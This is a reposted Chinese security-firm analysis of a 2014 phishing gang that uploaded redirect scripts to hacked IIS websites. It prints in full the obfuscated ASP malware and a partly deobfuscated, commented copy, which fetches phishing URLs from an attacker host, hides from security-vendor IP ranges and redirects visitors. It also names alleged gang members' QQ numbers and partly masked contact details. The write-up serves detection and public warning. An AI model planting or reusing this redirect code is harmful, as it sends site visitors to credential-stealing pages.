最新消息:
    你的位置:jinglingshu的博客 > 别人经典渗透过程学习 > 关于”马爷”网络钓鱼的分析报告

    关于”马爷”网络钓鱼的分析报告

    别人经典渗透过程学习 admin 2162浏览 0评论

    2014-01-20 知道创宇 网站安全中心

    一、背景

    网络钓鱼:攻击者向网民发出欺骗性的信息,意图引诱网民给出敏感信息(如:QQ账号密码、银行卡信息、在线支付平台账号密码等)。

     

    网络诈骗、网络钓鱼、伪基站、黑帽SEO、黑色产业链近几年仍然猖獗,本文主要针对某网络钓鱼案例给大家揭露黑色产业链背后的事情。

     

    2013年9月份左右腾讯管家监测到一批被挂非法跳转钓鱼页面的网站,很多网站被黑客非法入侵后,均被上传恶意文件至受害网站根目录下,其中文件名大略有:_sys.asp、bas.asp、pro.asp、dawm.asp这四种命名方式。

     

    例如被挂恶意文件的网站链接:http://gnxwhg.com/pro.asp?&jcjlz9pzd0y&te

    访问后页面将会跳转至钓鱼网站:

    1. http://zohqdt.eicp.net:2/27/
    2. http://qkepisav.vicp.cc:2/27/

     

    当我们第二天访问被黑网站链接的时候,跳转页面变成其他钓鱼页面了,有趣。

     

    二、网站被黑分析统计

     

    首先我们进行被黑网站IP段分析统计:

    IP图表分析统计:

    其中有4台主机IP相邻,112.121.176.67-70其中包含10个被黑网站。

     

    于是我们开始对被黑服务器进行容器分析,得出结果图表统计如下:

    • Microsoft IIS/6.0         27
    • Microsoft IIS其他版本    13
    • 其他                    9

     

    根据图表我们可以清楚的看到使用IIS容器的服务器占82%的比例,仅IIS/6.0就占有55%的使用率。

     

    后面我们又分析了被黑网站的应用指纹信息(应用系统):

     

    其中WordPress, 帝国CMS, Dedecms, 精良南方居多比例,其他应用也是鱼龙混杂各式各样。

     

    我们为什么要进行以上的分析统计呢?: 排除攻击者使用0day攻击的可能性

    所以根据我们推测,钓鱼团伙极有可能用廉价去大量收购Webshell(网站控制权限),从而节省自己入侵网站上传恶意跳转页面的时间。

     

    根据以上几点分析,简单的想象一下大致流程:

    1. 廉价大量购买Webshell
    2. 人工或自动化上传恶意跳转钓鱼页面文件
    3. 获取钓鱼后的用户隐私进行黑产交易

     

    三、网站被挂钓鱼的现象

     

    恶意跳转钓鱼页面文件名为:

    1. _sys.asp
    2. pro.asp
    3. dawn.asp
    4. bas.asp

     

    当我们试图单独访问这些文件的时候,页面只会返回一个数字0,如图:

    而钓鱼者可生成链接如:http://luyuanwine.com/_sys.asp?&jcv.ix&s&

    访问如上链接将会自动跳转到钓鱼页面,_sys.asp?后面则是黑客生成的伪随机字符串,他们将利用被入侵的网站进行页面跳转到钓鱼网站,实施钓鱼攻击。

     

    被入侵后上传钓鱼页面的网站将会被安全联盟等检测到恶意页面存在,导致搜索引擎降权、浏览网页弹出安全拦截提醒等情况发生。

     

     

    四、钓鱼跳转现象的背后细节

     

    我们前面说过,第二天访问被挂跳转页面的网站链接时,跳转后的链接变了,着实令我们感到奇怪。我们来看一下之前保存下来的两个跳转后的链接:

    1. http://zohqdt.eicp.net:2/27/
    2. http://qkepisav.vicp.cc:2/27/

     

    我们发现钓鱼团伙果然心计多端,采用的是免费二级域名提供商,钓鱼团伙利用免费域名提供商提供的服务域名来进行跳转,采用二级域名的好处有非常大的一点原因就是大大增加后期调查难度。

     

    我们获取了恶意跳转文件的样本,发现_sys, dawn, pro, bas.asp源代码均相同,仅仅是名字不同,恶意跳转文件样本很有趣,加花又加密:

     

    整个跳转钓鱼页面的ASP源代码

    [1: http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_encode.txt]

     

    他们对代码变量全部进行了打散加花来迷惑站长或者文件分析者。

    经过漫长的解密,我们得到了原本的文件源代码:

    [2: http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_decode.txt]

     

    这个源代码文件实现了:

    1. 判断SQL注入攻击
    2. 判断通道(http://mayeav.com:2/xx.txt)是否正常
    3. 获取通道内URL地址进行跳转
    4. Title进行随机生成

     

    他为什么会跳转动态的域名这一疑问现在就比较好解答了,其中来看代码46行:

    Response.Write “http://” &Request.ServerVariables(“HTTP_HOST”)&”  [通道正常 ” &EE__E_(“http://mayeav.com:2/xx.txt”)&”]”)

     

    代码会判断http://mayeav.com:2/xx.txt通道连接是否正常,然后58行代码会read xx.txt内容读取后进行跳转请求,整个过程可谓跳转连连。

     

    网站跳转–>获取通道内URL连接–>跳转二级域名钓鱼网站–>真实域名

     

    五、侦查钓鱼源头

    正如大家所望,是时候侦查一下钓鱼的源头了:)

    首先我们从分析样本阶段获取了最有意义的钓鱼攻击者真实域名:http://mayeav.com:2/

     

    于是理所当然的获取到了后台路径:

    钓鱼网站管理中心后台标注: 【V 2013】马爷工作室后台系统

     

    mayeav.com:2/01/

    mayeav.com:2/02/

    mayeav.com:2/…/

    mayeav.com:2/29/

     

    目录01穷举到29均是各种钓鱼网站,钓鱼网站目录:

     

    /admin/# 管理员后台

    /images/# Pic

    /Images/jdmk/

    /27/index_files/ff45cc10.jpg

    /27/include/

    /20/vget_i.js

     

    通过mayeav.com的注册人信息,我们得到了马爷的QQ号码:1872395818

    同样经过域名反查还得到了很多私服域名,且全部跳转到马爷钓鱼站点,所以这里推测私服域名注册人与马爷相识或者就是同一人所为。

    过了一杯茶的功夫,我们通过私服域名获取了如下的一份资料:

    联系人: 小往

    联系电话: 13618***453

    归属地: 湖北武汉

    电子邮件: 48**62@qq.com

     

    我们将拥有的以上资料的人假定为钓鱼团伙成员[A],紧接着我们又得到了一份关于钓鱼团伙成员[A]的朋友QQ号码,通过查询48**62时发现一个帖子中附带某网址链接,同样私服域名中也有他的注册(成员[B])。

     

    让我们来看看整个名单:

    马爷 QQ: 1872395818

    团伙成员[A] QQ: 48**62

    团伙成员[B] QQ: 505***850

     

    我们通过伪造身份接触钓鱼团伙成员[A],从长期深入聊天对话得知,成员[B]、马爷确实与他相识,这里基本可以拟定三人全部都是整个钓鱼团伙的谋事者:

     

    最后我们要去后台里面看个究竟了,看看这个钓鱼团伙究竟有多庞大?

     

    我们可以看到后台管理里面分为邮箱模板和空间模板,而每个钓鱼页面都是单独的一个模块,攻击者经过简单的配置即可发送给网民进行钓鱼攻击,从后台规模来看他们盗取的QQ号码以及其他网民信息已经过万条信息级别。

     

    在此忠告所有网民:“登陆网站时应先仔细确认网址是否为正常网址,以免发生不必要的损失!”

     

    [1] http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_encode.txt 加密前源代码

    [2] http://blog.knownsec.com/wp-content/uploads/2014/01/Phishing_source_decode.txt 分析后添加注释的源代码

    加密前代码:

    <%@ LANGUAGE = VBSCRIPT.ENCODE%>
<%
Dim E_E__E,E_E_E_,E_E_EE,E_EE__,E_EE_E
Set E_E_EE=Response:Set E_E_E_=Request:Set E_EE_E=Session:Set E_E__E=Application:Set E_EE__=Server
Dim EEE_E_,EEE_EE,EEEE__,EEEE_E,EEEEE_,EEEEEE

EEEE_E ="*|'|;|and|or|count|char|delete|declare|exec|insert|select|update|truncate|mid|master"
EEEEE_ = Split(EEEE_E,"|")
If Request.QueryString<>"" Then
For Each EEE_E_ In Request.QueryString
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.QueryString(EEE_E_)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Form<>"" Then
For Each EEE_EE In Request.Form
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Form(EEE_EE)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Cookies<>"" Then
For Each EEEE__ In Request.Cookies
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Cookies(EEEE__)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
if  EE_E__(Trim(Request.QueryString()))<1 then
Response.Write EE_E__(Trim(Request.QueryString()))
Response.End()
end if

if Trim(Request.QueryString())="ok" then

Response.Write "http://" &Request.ServerVariables("HTTP_HOST")&"  [通道正常 " &EE__E_("http://mayeav.com:2/xx.txt")&"]")
EE_EE_()
Response.End()
end if
Const EE_E__E ="222.202.*.*|220.249.*.*|219.232.*.*|219.223.*.*|219.134.*.*|219.133.*.*|218.18.*.*|211.148.*.*|211.96.*.*|210.21.*.*|203.86.*.*|202.105.*.*|202.96.*.*|202.104.*.*|202.103.*.*|61.144.*.*|61.141.*.*|59.40.*.*|58.60.*.*"
If E_EEE_(EE_E__E) = True Then

Response.Write("Bad Request (Invalid URL.)")
Response.End()
End If
Dim Str

Str = EE__E_("http://mayeav.com:2/xx.txt")
const EE_E_E_ ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
dim E_____E
dim E____E_(63)
dim E____EE(127)
sub EEE___
E_E___E=Str
randomize
E__EEE_= (82 * 53 - 4247)* Rnd

E_E___E="http://"+E_E___E
call EEE__E
E__EEEE=Trim(E_E_E_.QueryString())

E__EEEE= Replace(E__EEEE,"%","M")
E__EEEE= Replace(E__EEEE,"@","M")
E__EEEE= Replace(E__EEEE,"&","M")
E__EEEE= Replace(E__EEEE,".","P2lkPT")
E__EEEE=(EE___E(E__EEEE))

E__EEEE= Replace(E__EEEE,"#","")
Response.Redirect E_E___E&E__EEEE
end sub
Function E_EEE_(EEEE__E)
Dim E___E__, E___E_E, E___EE_, E___EEE, E__E___, E__E__E

E___EE_ = Split(EEEE__E, "|")
E___E_E = Split(E_EEEE(), ".")
For E__E___ = 0 To UBound(E___EE_)
E___E__ = (14 * 29 - 406)
E___EEE = Split(E___EE_(E__E___), ".")
For E__E__E = 0 To UBound(E___E_E)
If(E___EEE(E__E__E)) = "*" or Cstr(E___E_E(E__E__E)) = Cstr(E___EEE(E__E__E)) Then
E___E__ = E___E__ + (85 * 58 - 4929)
End If
Next
If E___E__ = 4 Then
E_EEE_ = True
Exit Function
End If
Next
E_EEE_ = False
End Function
Function E_EEEE()
Dim E__E_E_
E__E_E_ = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If E__E_E_ = "" Then E__E_E_ = Request.ServerVariables("REMOTE_ADDR")
E_EEEE = E__E_E_
End Function
Dim E__E_EE, E__EE__, E__EE_E,E__EEE_,E__EEEE,E_E____,E_E___E,E_E__E_
Dim E_E__EE
E_E__EE = Request.ServerVariables("HTTP_USER_AGENT")
E_E__EE = Lcase(E_E__EE)
Dim E_E_E__,E_E_E_E,E_E_EE_,E_E_EEE

EE_E_EE ="linux;“
EE_EE__="applewebkit"
EE_EE_E="0)"
EE_EEE_="msie 10.0"
EE_EEEE="msie 9.0"
EEE____="msie 8.0"
EEE___E="msie 7.0"
EEE__E_="msie 6.0"
if Instr(E_E__EE, EE_E_EE) <> 0 then
call EEE___
end if
if Instr(E_E__EE, EE_EE__) <> 0 then
call EEE___
end if
if Instr(E_E__EE, EE_EE_E) <> 0 or Instr(E_E__EE, EEE__E_) <> 0 or Instr(E_E__EE, EEE___E) <> 0 or Instr(E_E__EE, EEE____) <> 0 or Instr(E_E__EE, EE_EEEE) <> 0  or Instr(E_E__EE, EE_EEE_) <> 0 then
call EEE___
end if
PUBLIC SUB EEE__E()

E_____E ="<P>" & chr(13) & chr(10)
dim E_EE___, E_EE__E
E_EE___ = len(EE_E_E_)
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____E_(E_EE__E) = mid(EE_E_E_, E_EE__E + 1, 1)
next
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____EE(ASC(E____E_(E_EE__E))) = E_EE__E
next
END SUB
PUBLIC FUNCTION EE____(EEEE_E_)
if len(EEEE_E_) = 0 then
EE____ = ""
exit function
end if
dim E_EE_E_, E_EE_EE, E_EEE__, E_EEE_E, second, E_EEEEE
E_EEE__ = (len(EEEE_E_) \ 3) * (71 * 34 - 2411)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= E_EEE__
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EEEEE = asc(mid(EEEE_E_, E_EE_EE+2, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) + ((E_EEEEE \ 64) AND 3 ) )
E_EE_E_ = E_EE_E_ & E____E_( E_EEEEE AND 63)
E_EE_EE = E_EE_EE + (71 * 34 - 2411)
loop
if E_EEE__ < len(EEEE_E_) then
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
if (len(EEEE_E_) MOD 3 ) = 2 then
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) )
else
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E * 16) AND 48)
E_EE_E_ = E_EE_E_
end if
E_EE_E_ = E_EE_E_
end if
EE____ = E_EE_E_
END FUNCTION
PUBLIC FUNCTION EE___E(EEEE_EE)
if len(EEEE_EE) = 0 then
EE___E = ""
exit function
end if
dim EE_____
EE_____ = len(EEEE_EE)
do while mid(EEEE_EE, EE_____, 1) ="="
EE_____ = EE_____ - (85 * 58 - 4929)
loop
dim E_EE_E_, E_EE_EE, EE____E, E_EEE_E, second, E_EEEEE, EE___E_
E_EE_E_ = ""
EE____E = (EE_____ \ 4) * (100 * 107 - 10696)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= EE____E
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EEEEE = E____EE(asc(mid(EEEE_EE, E_EE_EE+2, 1)))
EE___E_ = E____EE(asc(mid(EEEE_EE, E_EE_EE+3, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
E_EE_E_ = E_EE_E_ & chr( ((E_EEEEE * 64) AND 255) + (EE___E_ AND 63))
E_EE_EE = E_EE_EE + (100 * 107 - 10696)
loop
if E_EE_EE < EE_____ then
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
if EE_____ MOD 4 = 3 then
E_EEEEE = E____EE(asc(mid(EEEE_EE,E_EE_EE+2,1)))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
end if
end if
EE___E=E_EE_E_
END FUNCTION
Function EE__E_(EEEEE__)
Set EEE__EE=Server.CreateObject("Microsoft.XMLHTTP")
On Error Resume Next
EEE__EE.Open GET,EEEEE__,False
EEE__EE.send()
if Err then
Err.Clear
Response.Write("#Bad Request (Invalid URL)“)
Response.End()
End if
EEE_E__=EE__EE(EEE__EE.responseBody,gb2312)
set EEE__EE=nothing
EE__E_=EEE_E__
End Function
Function EE__EE(EEEEE_E,EEEEEE_)
Dim EE___EE
Set EE___EE = Server.CreateObject(”adodb.stream“)
EE___EE.Type = (85 * 58 - 4929)
EE___EE.Mode = (71 * 34 - 2411)
EE___EE.Open
EE___EE.Write EEEEE_E
EE___EE.Position = (14 * 29 - 406)
EE___EE.Type = (14 * 102 - 1426)
EE___EE.Charset = EEEEEE_
EE__EE = EE___EE.ReadText
EE___EE.Close
set EE___EE = nothing
End Function
function EE_E__(str)
if isnull(str) or str = "" then
EE_E__ = (14 * 29 - 406)
else
dim E__E___, EE__E__, EE__E_E, EE__EE_
EE__E_E = (14 * 29 - 406)
EE__E__ = len(str)
for E__E___ = 1 to EE__E__
EE__EE_ = mid(str, E__E___, 1)
if asc(EE__EE_) >= 0 and asc(EE__EE_) <= 255 then
EE__E_E = EE__E_E + (85 * 58 - 4929)
else
EE__E_E = EE__E_E + (14 * 102 - 1426)
end if
next
EE_E__ = EE__E_E
end if
end function
Function EE_E_E(EEEEEEE)
On Error Resume Next
EE_E_E = False
Err = (14 * 29 - 406)
Dim EE__EEE
Set EE__EEE = Server.CreateObject(EEEEEEE)
If 0 = Err Then EE_E_E = True
Set EE__EEE = Nothing
Err = (14 * 29 - 406)
End Function
Function EE_EE_()
EEE_E_E = Server.mappath(Request.ServerVariables("SCRIPT_NAME"))
If EE_E_E("Scripting.FileSystemObject") = False Then
Else
Set EEE_EE_ = Server.CreateObject("Scripting.FileSystemObject")
EEE_EEE = EEE_EE_.getFile(EEE_E_E).Attributes
if EEE_EEE = 32 or EEE_EEE = 1 or EEE_EEE = 2 then
EEE_EE_.getFile(EEE_E_E).Attributes = (98 * 32 - 1081)
end if
End If
End Function
Function EE_EEE(ByVal EEEE___)
Dim EE_E___, E__E___, EE__E__
EEEE___ = Replace(EEEE___, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))
For E__E___ = 1 To Len(EEEE___)
If E__E___ <> EE__E__ Then
EE_E___ = AscW(Mid(EEEE___, E__E___, 1))
If EE_E___ >= 33 And EE_E___ <= 79 Then
EE_EEE = EE_EEE & Chr(EE_E___ + 47)
ElseIf EE_E___ >= 80 And EE_E___ <= 126 Then
EE_EEE = EE_EEE & Chr(EE_E___ - 47)
Else
EE__E__ = E__E___ + 1
If Mid(EEEE___, EE__E__, 1) = EE_EEE("o") Then EE_EEE = EE_EEE & ChrW(EE_E___ + 5) Else EE_EEE = EE_EEE & Mid(EEEE___, E__E___, 1)
End If
End If
Next
End Function
%>

    分析后添加注释的源代码:

    <%@ LANGUAGE = VBSCRIPT.ENCODE%>
<%
Dim E_E__E,E_E_E_,E_E_EE,E_EE__,E_EE_E
Set E_E_EE=Response:Set E_E_E_=Request:Set E_EE_E=Session:Set E_E__E=Application:Set E_EE__=Server
Dim EEE_E_,EEE_EE,EEEE__,EEEE_E,EEEEE_,EEEEEE


'===================================================================================================================================
'过滤SQL注入
EEEE_E ="*|'|;|and|or|count|char|delete|declare|exec|insert|select|update|truncate|mid|master"
EEEEE_ = Split(EEEE_E,"|")
If Request.QueryString<>"" Then
For Each EEE_E_ In Request.QueryString
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.QueryString(EEE_E_)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Form<>"" Then
For Each EEE_EE In Request.Form
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Form(EEE_EE)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
If Request.Cookies<>"" Then
For Each EEEE__ In Request.Cookies
For EEEEEE=0 To Ubound(EEEEE_)

If Instr(LCase(Request.Cookies(EEEE__)),EEEEE_(EEEEEE))>0 Then Response.Write "对不起,请勿提交非法字符!":Response.End
Next
Next
End If
if  EE_E__(Trim(Request.QueryString()))<1 then
Response.Write EE_E__(Trim(Request.QueryString()))
Response.End()
end if


'===================================================================================================================================
'检查钓鱼网站更新情况,获取新的调用网站
if Trim(Request.QueryString())="ok" then

Response.Write "http://" &Request.ServerVariables("HTTP_HOST")&"  [通道正常 " &xml_request_fun("http://mayeav.com:2/xx.txt")&"]")
EE_EE_()
Response.End()
end if
Const EE_E__E ="222.202.*.*|220.249.*.*|219.232.*.*|219.223.*.*|219.134.*.*|219.133.*.*|218.18.*.*|211.148.*.*|211.96.*.*|210.21.*.*|203.86.*.*|202.105.*.*|202.96.*.*|202.104.*.*|202.103.*.*|61.144.*.*|61.141.*.*|59.40.*.*|58.60.*.*"
If E_EEE_(EE_E__E) = True Then

Response.Write("Bad Request (Invalid URL.)")
Response.End()
End If
Dim Str

Str = xml_request_fun("http://mayeav.com:2/xx.txt")
const EE_E_E_ ="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
dim E_____E
dim E____E_(63)
dim E____EE(127)

'===================================================================================================================================
'跳转到钓鱼网站
sub jump_fishsite_fun
E_E___E=Str
randomize
E__EEE_= (82 * 53 - 4247)* Rnd

E_E___E="http://"+E_E___E
call EEE__E
E__EEEE=Trim(E_E_E_.QueryString())

E__EEEE= Replace(E__EEEE,"%","M")
E__EEEE= Replace(E__EEEE,"@","M")
E__EEEE= Replace(E__EEEE,"&","M")
E__EEEE= Replace(E__EEEE,".","P2lkPT")
E__EEEE=(EE___E(E__EEEE))

E__EEEE= Replace(E__EEEE,"#","")
Response.Redirect E_E___E&E__EEEE
end sub

Function E_EEE_(EEEE__E)
Dim E___E__, E___E_E, E___EE_, E___EEE, E__E___, E__E__E

E___EE_ = Split(EEEE__E, "|")
E___E_E = Split(get_client_ip_fun(), ".")
For E__E___ = 0 To UBound(E___EE_)
E___E__ = (14 * 29 - 406)
E___EEE = Split(E___EE_(E__E___), ".")
For E__E__E = 0 To UBound(E___E_E)
If(E___EEE(E__E__E)) = "*" or Cstr(E___E_E(E__E__E)) = Cstr(E___EEE(E__E__E)) Then
E___E__ = E___E__ + (85 * 58 - 4929)
End If
Next
If E___E__ = 4 Then
E_EEE_ = True
Exit Function
End If
Next
E_EEE_ = False
End Function

'===================================================================================================================================
'获取客户端IP
Function get_client_ip_fun()
Dim E__E_E_
E__E_E_ = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If E__E_E_ = "" Then E__E_E_ = Request.ServerVariables("REMOTE_ADDR")
get_client_ip_fun = E__E_E_
End Function

Dim E__E_EE, E__EE__, E__EE_E,E__EEE_,E__EEEE,E_E____,E_E___E,E_E__E_
Dim E_E__EE
E_E__EE = Request.ServerVariables("HTTP_USER_AGENT")
E_E__EE = Lcase(E_E__EE)
Dim E_E_E__,E_E_E_E,E_E_EE_,E_E_EEE

EE_E_EE ="linux;“
EE_EE__="applewebkit"
EE_EE_E="0)"
EE_EEE_="msie 10.0"
EE_EEEE="msie 9.0"
EEE____="msie 8.0"
EEE___E="msie 7.0"
Exml_request_fun="msie 6.0"
if Instr(E_E__EE, EE_E_EE) <> 0 then
call jump_fishsite_fun
end if
if Instr(E_E__EE, EE_EE__) <> 0 then
call jump_fishsite_fun
end if
if Instr(E_E__EE, EE_EE_E) <> 0 or Instr(E_E__EE, Exml_request_fun) <> 0 or Instr(E_E__EE, EEE___E) <> 0 or Instr(E_E__EE, EEE____) <> 0 or Instr(E_E__EE, EE_EEEE) <> 0  or Instr(E_E__EE, EE_EEE_) <> 0 then
call jump_fishsite_fun
end if


PUBLIC SUB EEE__E()
E_____E ="<P>" & chr(13) & chr(10)
dim E_EE___, E_EE__E
E_EE___ = len(EE_E_E_)
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____E_(E_EE__E) = mid(EE_E_E_, E_EE__E + 1, 1)
next
for E_EE__E = 0 to E_EE___ - (85 * 58 - 4929)
E____EE(ASC(E____E_(E_EE__E))) = E_EE__E
next
END SUB


PUBLIC FUNCTION EE____(EEEE_E_)
if len(EEEE_E_) = 0 then
EE____ = ""
exit function
end if
dim E_EE_E_, E_EE_EE, E_EEE__, E_EEE_E, second, E_EEEEE
E_EEE__ = (len(EEEE_E_) \ 3) * (71 * 34 - 2411)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= E_EEE__
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EEEEE = asc(mid(EEEE_E_, E_EE_EE+2, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) + ((E_EEEEE \ 64) AND 3 ) )
E_EE_E_ = E_EE_E_ & E____E_( E_EEEEE AND 63)
E_EE_EE = E_EE_EE + (71 * 34 - 2411)
loop
if E_EEE__ < len(EEEE_E_) then
E_EEE_E = asc(mid(EEEE_E_, E_EE_EE+0, 1))
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E \ 4) AND 63 )
if (len(EEEE_E_) MOD 3 ) = 2 then
second = asc(mid(EEEE_E_, E_EE_EE+1, 1))
E_EE_E_ = E_EE_E_ & E____E_( ((E_EEE_E * 16) AND 48) + ((second \ 16) AND 15 ) )
E_EE_E_ = E_EE_E_ & E____E_( ((second * 4) AND 60) )
else
E_EE_E_ = E_EE_E_ & E____E_( (E_EEE_E * 16) AND 48)
E_EE_E_ = E_EE_E_
end if
E_EE_E_ = E_EE_E_
end if
EE____ = E_EE_E_
END FUNCTION


PUBLIC FUNCTION EE___E(EEEE_EE)
if len(EEEE_EE) = 0 then
EE___E = ""
exit function
end if
dim EE_____
EE_____ = len(EEEE_EE)
do while mid(EEEE_EE, EE_____, 1) ="="
EE_____ = EE_____ - (85 * 58 - 4929)
loop
dim E_EE_E_, E_EE_EE, EE____E, E_EEE_E, second, E_EEEEE, EE___E_
E_EE_E_ = ""
EE____E = (EE_____ \ 4) * (100 * 107 - 10696)
E_EE_EE = (85 * 58 - 4929)
do while E_EE_EE <= EE____E
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EEEEE = E____EE(asc(mid(EEEE_EE, E_EE_EE+2, 1)))
EE___E_ = E____EE(asc(mid(EEEE_EE, E_EE_EE+3, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
E_EE_E_ = E_EE_E_ & chr( ((E_EEEEE * 64) AND 255) + (EE___E_ AND 63))
E_EE_EE = E_EE_EE + (100 * 107 - 10696)
loop
if E_EE_EE < EE_____ then
E_EEE_E = E____EE(asc(mid(EEEE_EE, E_EE_EE+0, 1)))
second = E____EE(asc(mid(EEEE_EE, E_EE_EE+1, 1)))
E_EE_E_ = E_EE_E_ & chr( ((E_EEE_E * 4) AND 255) + ((second \ 16) AND 3))
if EE_____ MOD 4 = 3 then
E_EEEEE = E____EE(asc(mid(EEEE_EE,E_EE_EE+2,1)))
E_EE_E_ = E_EE_E_ & chr( ((second * 16) AND 255) + ((E_EEEEE \ 4) AND 15))
end if
end if
EE___E=E_EE_E_
END FUNCTION


'===================================================================================================================================
'xml_request_fun网络请求函数
Function xml_request_fun(EEEEE__)
Set Eadodb_stream_fun=Server.CreateObject("Microsoft.XMLHTTP")
On Error Resume Next
Eadodb_stream_fun.Open GET,EEEEE__,False
Eadodb_stream_fun.send()
if Err then
Err.Clear
Response.Write("#Bad Request (Invalid URL)“)
Response.End()
End if
EEE_E__=adodb_stream_fun(Eadodb_stream_fun.responseBody,gb2312)
set Eadodb_stream_fun=nothing
xml_request_fun=EEE_E__
End Function


'===================================================================================================================================
'adodb_stream_fun读文本函数
Function adodb_stream_fun(EEEEE_E,EEEEEE_)
Dim EE___EE
Set EE___EE = Server.CreateObject(”adodb.stream“)
EE___EE.Type = (85 * 58 - 4929)
EE___EE.Mode = (71 * 34 - 2411)
EE___EE.Open
EE___EE.Write EEEEE_E
EE___EE.Position = (14 * 29 - 406)
EE___EE.Type = (14 * 102 - 1426)
EE___EE.Charset = EEEEEE_
adodb_stream_fun = EE___EE.ReadText
EE___EE.Close
set EE___EE = nothing
End Function


function EE_E__(str)
if isnull(str) or str = "" then
EE_E__ = (14 * 29 - 406)
else
dim E__E___, xml_request_fun_, xml_request_funE, adodb_stream_fun_
xml_request_funE = (14 * 29 - 406)
xml_request_fun_ = len(str)
for E__E___ = 1 to xml_request_fun_
adodb_stream_fun_ = mid(str, E__E___, 1)
if asc(adodb_stream_fun_) >= 0 and asc(adodb_stream_fun_) <= 255 then
xml_request_funE = xml_request_funE + (85 * 58 - 4929)
else
xml_request_funE = xml_request_funE + (14 * 102 - 1426)
end if
next
EE_E__ = xml_request_funE
end if
end function


Function EE_E_E(EEEEEEE)
On Error Resume Next
EE_E_E = False
Err = (14 * 29 - 406)
Dim adodb_stream_funE
Set adodb_stream_funE = Server.CreateObject(EEEEEEE)
If 0 = Err Then EE_E_E = True
Set adodb_stream_funE = Nothing
Err = (14 * 29 - 406)
End Function


Function EE_EE_()
EEE_E_E = Server.mappath(Request.ServerVariables("SCRIPT_NAME"))
If EE_E_E("Scripting.FileSystemObject") = False Then
Else
Set EEE_EE_ = Server.CreateObject("Scripting.FileSystemObject")
EEE_EEE = EEE_EE_.getFile(EEE_E_E).Attributes
if EEE_EEE = 32 or EEE_EEE = 1 or EEE_EEE = 2 then
EEE_EE_.getFile(EEE_E_E).Attributes = (98 * 32 - 1081)
end if
End If
End Function


Function EE_EEE(ByVal EEEE___)
Dim EE_E___, E__E___, xml_request_fun_
EEEE___ = Replace(EEEE___, Chr(37) & ChrW(-243) & Chr(62), Chr(37) & Chr(62))
For E__E___ = 1 To Len(EEEE___)
If E__E___ <> xml_request_fun_ Then
EE_E___ = AscW(Mid(EEEE___, E__E___, 1))
If EE_E___ >= 33 And EE_E___ <= 79 Then
EE_EEE = EE_EEE & Chr(EE_E___ + 47)
ElseIf EE_E___ >= 80 And EE_E___ <= 126 Then
